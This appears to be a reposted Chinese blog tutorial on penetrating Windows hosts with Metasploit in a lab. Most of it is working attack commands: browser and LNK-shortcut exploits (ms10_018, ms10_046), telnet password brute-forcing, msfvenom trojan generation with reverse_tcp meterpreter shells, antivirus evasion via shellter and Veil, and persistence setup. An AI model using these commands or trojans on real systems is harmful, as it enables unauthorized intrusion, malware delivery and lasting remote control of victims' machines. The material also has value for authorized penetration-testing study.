本文共 1958 字,大约阅读时间需要 6 分钟。
msf利用浏览器漏洞渗透
这里利用IE6和漏洞ms10_018原理:自己制作一个网上的资源,通过让目标主机访问这个资源,利用目标主机中浏览器的漏洞来共同导致被攻击的结果。
msfconsole
启动msf
search ms10_018
查看相关漏洞
use exploit/windows/browser/ms10_018_ie_behaviors
选择相应模块 set LHOST 192.168.223.140
set URIPATH test
set PAYLOAD windows/meterpreter/reverse_tcp
设置payload模块
set SRVHOST 192.168.223.140
设置反弹到的ip exploit
生成网页链接,被攻击机使用ie有浏览器漏洞访问这个链接后,kali中显示攻击成功, sessions -l
查看会话 seesions -i id
选择id shell命令转到被攻击机的终端中,可以进行相关操作。
msf利用快捷方式漏洞
原理: 利用系统解析后缀名的机制,恶意构造一个lnk(快捷方式)的文件,并构造一串程序代码来欺骗操作系统,的那个shell32.dll解析到这串编码的时候,会认为这个快捷方式依赖一个系统dll,并把这个dll加载到内存中,如果加载的这个dll是一个病毒,那就把病毒激活了。
这个漏洞的危害性表现在不需要执行文件,而是只要一访问,系统就会自动对它进行解析,并加载"dll"从而中招use exploit/windows/browser/ms10_046_shortcut_icon_dllloader
set PAYLPAD windows/meterpreter/reverse_tcp set SRVHOST 192.168.88.227 set LHOST 192.168.88.227 exploitmsf对telnet爆破
原理;弱口令爆破,msf自带字典
use auxiliary/scanner/telnet/telnet_login
set RHOSTS 192.168.223.130
show options
set username jgc
set pass_file /root/myfile/pass.txt
exploit
msf监听并反弹payload
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp set LHOST 本机ipmsf生成木马文件
原理: 利用msf模块中的msfvenom模块,首先生成.exe木马文件,用被攻击机打开会就会中马
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.110 LPORT=12345 -f exe > /root/test.exe
生成木马文件 (本机ip和端口)
use exploit/multi/handler
进入监听模块
set payload windows/meterpreter/reverse_tcp
设置反弹payload set LHOST ip
(要监听的本地IP) set LPORT port
(要监听本地端口) 当被攻击及执行木马文件后,就会在msf监听下有相应,通过shell命令可以进入shell环境。
msf木马免杀
原理: 首先生成木马文件,然后将生成的木马文件与shellter免杀工具捆绑,然后设置监听,将捆绑后的文件拷贝到被攻击系统中,双击后,发现攻击成功。
apt-get install shellter 下载shellter
cd shellter wine shellter.exe A /root/test.exe 在网上找到的就是这几条命令,但是本地环境搭建时出问题了没能成功msf持续控制
使用到veil
veil-evasion 打开veil
use 使用use模块 set LHOST 本机ip set LPORT 1234(本机端口任意) test 设置输出的文件名 到这里会生成免杀木马文件把文件拷贝到xp里
进入console
use exploit/multi/handler set PAYLOAD windows/meterpreter/reverse_tcp set LHOST ip set LPORT 1234 exploitxp运行木马文件,msf中最出现反弹shell
msf中命令:run persistence -U -i 5 -r ip -p 1234
reboot xp重启 run 建立持久链接转载地址:http://rwnh.baihongyu.com/